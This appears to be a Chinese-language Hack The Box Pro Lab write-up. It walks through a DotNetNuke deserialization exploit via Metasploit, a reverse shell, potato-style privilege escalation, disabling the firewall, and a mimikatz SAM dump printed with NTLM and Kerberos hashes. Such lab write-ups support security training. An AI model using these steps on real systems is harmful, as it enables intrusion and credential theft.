扫描网段主机
nmap 10.10.110.0/24
从上面看该网段是4个主机,先看第一个10.10.110.10主机,进入网页
从里面分析,文字里面写了DNN® Platform,叫DotNetNuke,是一个开源的内容管理系统(CMS),用于构建网站和网上应用程序,先在exploitdb里面找一下exploit
看到有个exp是在美少妇有模块,进入美少妇问问,直接在美少妇搜索DotNetNuke
选择该模块,输入info命令得知漏洞是一种反序列化漏洞,它影响DotNetNuke(DNN)版本5.0.0至9.3.0-RC。DNN个人化信息存储在DNNPersonalization cookie中,并以XML格式存在
设置exp的参数,其中token跟IV参数是在网页的后台,设置443端口
成功反弹shell,输入getuid命令得到当下的用户是NT AUTHORITYNETWORK SERVICE,尝试直接getsystem命令,获得admin权限
看来被限制了,进入shell,输入whoami /priv查看提权信息
发现了SeImpersonatePrivilege是开着的,老配方,使用土豆.exe
god.exe -cmd "cmd /c whoami"
成功反弹shell,拿到nt authoritysystem,经过搜寻,在C:DotNetNuke底下可以拿到一个flag,Administrator桌面没有
先关闭防火墙,有杀毒,然后上传mimikatz,获得hsah
SAM
lsadump::sam
mimikatz # Domain : CYWEBDW
SysKey : 6f9ec047e0cc2be91f5463aeb3189568
Local SID : S-1-5-21-974100046-684349727-4186098362
SAMKey : 7f23249058837880f70a9947d9f377f3
RID : 000001f4 (500)
User : Administrator
Hash NTLM: 7574cbf9d92c39d1d4dccd7b89301d2f
Supplemental Credentials:
Primary:NTLM-Strong-NTOWF *
Random Value : dc982f326b5017e646efe1d5760d0f04
Primary:Kerberos-Newer-Keys *
Default Salt : ADMINIS-GL281LHAdministrator
Default Iterations : 4096
Credentials
aes256_hmac (4096) : f3cd0f0ed222e7378931e8287386b53196631392024548d639d6b76b4ab9d761
aes128_hmac (4096) : 109316d3a8ea62d8e654d8534d3c8622
des_cbc_md5 (4096) : 432aa25eec1f97c1
OldCredentials
aes256_hmac (4096) : 407f19837353860d58c535aacd8d005f4fdb6b96b62f8322165fecb3c3079806
aes128_hmac (4096) : 068f6fcf2fc64585b19a05b9422367cc
des_cbc_md5 (4096) : 8fba4cb6166e2f8c
OlderCredentials
aes256_hmac (4096) : 2e9115dfd756f72a5fef3bdd1ba213a17448e410462081721cdef0cfde4beb16
aes128_hmac (4096) : 422895ede582fe5680cf2f16927596a8
des_cbc_md5 (4096) : 647a01f8626bbf9d
Packages *
NTLM-Strong-NTOWF
Primary:Kerberos *
Default Salt : ADMINIS-GL281LHAdministrator
Credentials
des_cbc_md5 : 432aa25eec1f97c1
OldCredentials
des_cbc_md5 : 8fba4cb6166e2f8c
RID : 000001f5 (501)
User : Guest
RID : 000001f7 (503)
User : DefaultAccount
RID : 000001f8 (504)
User : WDAGUtilityAccount
原文始发于微信公众号(Jiyou too beautiful):HTB-prolab-Cybernetics笔记-cywebdw-10.9.20.13
免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉。
- 左青龙
- 微信扫一扫
-
- 右白虎
- 微信扫一扫
-
评论